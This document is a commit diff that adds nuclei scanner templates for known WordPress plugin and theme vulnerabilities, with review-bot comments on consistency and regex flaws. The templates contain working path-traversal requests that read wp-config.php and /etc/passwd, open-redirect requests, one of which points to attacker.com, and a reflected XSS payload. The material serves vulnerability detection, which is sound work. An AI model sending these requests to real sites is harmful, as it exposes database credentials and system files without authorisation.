commit
7bf3ac584c
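--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,24 @@
+id: candidate-application-lfi
+
+info:
+  name: Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download
+  author: dhiyaneshDK
+  severity: high
+  description: The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.
+  reference: https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
+  tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200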
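Review bot: The regex matcher under `matchers:` carries no `part:`, while every word matcher in this commit states `part: body` explicitly; adding `part: body` above `regex:` makes this template read like the others and removes the reliance on the default part (the simple-image-manipulator-lfi template has the same omission). The `author:` value is spelled `dhiyaneshDK` here and `dhiyaneshDk` in the open-redirect templates; presumably author-based template selection is case-sensitive, so one spelling across the set is worth settling on. `reference:` is a scalar here and a list in cherry-lfi and db-backup-lfi; the list form is the one that still reads cleanly when a second link is added.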
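--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,29 @@
+id: cherry-lfi
+
+info:
+  name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
+  author: dhiyaneshDK
+  severity: high
+  description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
+  reference:
+    - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
+    - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
+  tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200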
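Review bot: The `name:` and `description:` describe an upload-and-download vulnerability, but the single request under `requests:` only exercises the download side (download-content.php with a `file=` parameter), so a finding produced by this template says nothing about whether the upload path is reachable. Suggest narrowing the name to what is actually verified, e.g. `name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download`, or adding a sentence to the description stating that only the download endpoint is checked.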
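--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,27 @@
+id: churchope-lfi
+
+info:
+  name: ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)
+  author: dhiyaneshDK
+  severity: high
+  description: The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
+  reference: https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15
+  tags: wordpress,wp-theme,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200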
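--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,29 @@
+id: db-backup-lfi
+
+info:
+  name: DB Backup <= 4.5 - Path Traversal File Access
+  author: dhiyaneshDK
+  severity: high
+  description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected.
+  reference:
+    - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
+    - https://www.exploit-db.com/exploits/35378
+  tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200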
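--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,43 @@
+id: elementorpage-open-redirect
+
+info:
+  name: The Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an Open Redirect issue.
+  reference: https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d
+  tags: wordpress,redirect,wp-plugin,elementor,wp
+
+requests:
+  - raw:
+      - |
+        GET /?author=1 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+    extractors:
+      - type: regex
+        part: body
+        name: username
+        internal: true
+        group: 1
+        regex:
+          - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
+
+      - type: regex
+        part: header
+        name: username
+        internal: true
+        group: 1
+        regex:
+          - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'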
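Review bot: `redirects: true` applies to both raw requests, so on a vulnerable target the second request's redirect is presumably followed and the response handed to the `part: header` matcher is the last one in the chain, which would normally carry no `Location: …attacker.com` header; the header extractor (`ion: https:\/\/…\/author\/([a-z]+)\/`) likewise only sees a `Location` header if the first redirect is not followed, while the body extractor only works if it is. Confirm against nuclei's raw-request semantics whether matchers run per response or only on the final one; if the latter, dropping `redirects: true` and keeping only the header extractor is the simpler fix. The redirect target `attacker.com` is a real third-party domain, whereas the rest of this commit uses the reserved `example.com`; with redirects enabled the scanner itself would contact that site. The Location regex shared with the other open-redirect templates (eventtickets, music-store, newsletter, ninjaform, noptin, webp-converter) allows any host-character prefix before the domain and any non-dot continuation after it, so `Location: https://notattacker.com` or `attacker.comfoo` would also match; requiring the domain to start right after the scheme or `@` and to end at `/`, `:`, `?`, `#` or end of line would tighten it.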
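--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,20 @@
+id: eventtickets-open-redirect
+
+info:
+  name: Event Tickets < 5.2.2 - Open Redirect
+  author: dhiyaneshDk
+  severity: low
+  description: The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue
+  reference: https://wpscan.com/vulnerability/80b0682e-2c3b-441b-9628-6462368e5fc7
+  tags: wordpress,redirect,wp-plugin,eventtickets,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com"
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1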
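--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,28 @@
+id: hb-audio-lfi
+
+info:
+  name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
+  author: dhiyaneshDK
+  severity: high
+  reference: https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
+  metadata:
+    google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite
+  tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200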
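Review bot: This template has no `description:` under `info:`, unlike the other LFI templates in the commit (sniplets-lfi has the same gap), so a person triaging a finding has only the name and an external link to go on. A one-line description checked against the linked advisory, along the lines of `description: audio-download.php serves the file named by the file_path parameter without restricting it to the plugin's media directory.`, would give the report something actionable; the `file_size=10` parameter in the request is also worth a word, since nothing here explains why it is needed.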
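--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,27 @@
+id: hide-security-enhancer-lfi
+
+info:
+  name: WP Hide Security Enhancer 1.3.9.2 - Arbitrary File Download Vulnerability
+  author: dhiyaneshDK
+  severity: high
+  description: WP Hide Security Enhancer version 1.3.9.2 or less is victim of an Arbitrary File Download vulnerability. This allows any visitor to download any file in our installation
+  reference: https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/
+  tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200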
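--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,24 @@
+id: music-store-open-redirect
+
+info:
+  name: Music Store <= 1.0.14 - Referer Header Open Redirect
+  author: dhiyaneshDk
+  severity: medium
+  description: The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/d73f6575-eb86-480c-bde1-f8765870cdd1
+    - https://seclists.org/fulldisclosure/2015/Jul/113
+  tags: wordpress,redirect,wp-plugin,musicstore,wp
+
+requests:
+  - raw:
+      - |
+        GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
+        Host: {{Hostname}}
+        Referer: https://example.com
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1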
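--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,20 @@
+id: newsletter-open-redirect
+
+info:
+  name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
+  reference: https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
+  tags: wordpress,redirect,wp-plugin,newsletter,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL3d3dy5nb29nbGUuY29t"
+
+    matchers:
+      - type: regex
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)google\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+        part: header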
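Review bot: `part: header` is placed after the `regex:` list in this matcher, whereas every other header matcher in the commit puts `part:` directly under `- type: regex`; mappings are unordered so it parses the same, but the different layout makes the templates harder to compare side by side. Move `part: header` up to sit between `- type: regex` and `regex:`. The redirect target here is `google.com` (base64-encoded in `appurl`), as it is in ninjaform-open-redirect, while the other open-redirect templates use the reserved `example.com`; using the example domain throughout avoids naming a real third party in scan output and keeps the Location regex identical across the set.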
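--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,30 @@
+id: ninjaform-open-redirect
+
+info:
+  name: Ninja Forms < 3.4.34 - Administrator Open Redirect
+  author: dhiyaneshDk
+  severity: medium
+  description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
+  reference: https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
+  tags: wordpress,redirect,wp-plugin,ninjaform,wp,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://google.com&action=nf_oauth_connect HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)google\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1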
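Review bot: The login request reads `{{username}}` and `{{password}}`, but nothing in the template says these are operator-supplied; the `authenticated` tag hints at it, yet a reader cannot tell which variable names to pass, and if they are left unset the placeholders are presumably sent as-is. Suggest a comment above `requests:` such as `# requires username and password to be supplied as template variables (administrator account)`, since the `name:` says the issue is reachable only as an administrator.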
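--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,22 @@
+id: noptin-open-redirect
+
+info:
+  name: Noptin < 1.6.5 - Open Redirect
+  author: dhiyaneshDk
+  severity: low
+  description: The plugin does not validate the to parameter before redirecting the user to its given value, leading to an open redirect issue
+  reference:
+    - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c
+    - https://plugins.trac.wordpress.org/changeset/2639592
+  tags: wordpress,redirect,wp-plugin,noptin,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' #https://regex101.com/r/ZDYhFh/1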
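Review bot: The trailing comment on the regex line is written `#https://regex101…` with no space after `#`, while the identical comment in the other open-redirect templates reads `# https://regex101…`; yamllint's `comments` rule flags the missing space. Change it to `# https://regex101.com/r/ZDYhFh/1`.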
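--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,29 @@
+id: shortcode-lfi
+
+info:
+  name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3)
+  author: dhiyaneshDK
+  severity: high
+  description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected.
+  reference: https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
+  metadata:
+    google-dork: inurl:wp/wp-content/force-download.php
+  tags: wordpress,wp-plugin,lfi,shortcode,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200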
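Review bot: The `name:` and `description:` pin the affected version to `0.2.3`, but the only `reference:` is an advisory titled "WordPress-ShortCode-1.1-Local-File-Inclusion", so the version numbers disagree, and the request path `/wp-content/force-download.php` sits outside the plugins directory, which makes it unclear that the reference describes the same component. Suggest either adding a reference that covers the 0.2.3 / force-download.php case or aligning the name and description with the linked advisory, so the finding a user receives can be traced to a source.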
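--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,24 @@
+id: simple-image-manipulator-lfi
+
+info:
+  name: Simple Image Manipulator v1.0 - Remote file download
+  author: dhiyaneshDK
+  severity: high
+  description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
+  reference: https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
+  tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200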
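Review bot: The request path contains a literal `./` segment, `/wp-content/plugins/./simple-image-manipulator/controller/download.php`, apparently carried over from the `./simple-image-manipulator/...` notation in the description; most servers normalise it away, but it is not guaranteed, and it makes this template's URL shape differ from every other one in the commit for no reason. Use `'{{BaseURL}}/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=/etc/passwd'`. The regex matcher also has no `part:`; `part: body` keeps it consistent with the word matchers elsewhere.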
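--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,26 @@
+id: sniplets-lfi
+
+info:
+  name: Wordpress Plugin Sniplets 1.1.2 - LFI
+  author: dhiyaneshDK
+  severity: high
+  reference: https://www.exploit-db.com/exploits/5194
+  tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200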
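--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,30 @@
+id: sniplets-xss
+
+info:
+  name: Wordpress Plugin Sniplets - XSS
+  author: dhiyaneshDK
+  severity: medium
+  description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
+  reference: https://www.exploit-db.com/exploits/5194
+  tags: xss,wordpress,wp-plugin,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200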
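--- /dev/null
+++ b/<PATH-NOT-ON-PAGE>
@@ -0,0 +1,20 @@
+id: webp-coverter-open-redirect
+
+info:
+  name: WebP Converter for Media < 4.0.3 - Unauthenticated Open redirect
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an Open Redirect issue.
+  reference: https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164
+  tags: wordpress,redirect,wp-plugin,webpconverter,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com"
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1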
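Review bot: The template `id:` is misspelled `webp-coverter-open-redirect`, while the `name:`, the `webpconverter` tag and the request path all say "converter"; template ids are what users pass to include or exclude templates and what findings are keyed by, so the typo will propagate into reports and filter lists once the template ships. Change it to `id: webp-converter-open-redirect` before anything references the current id.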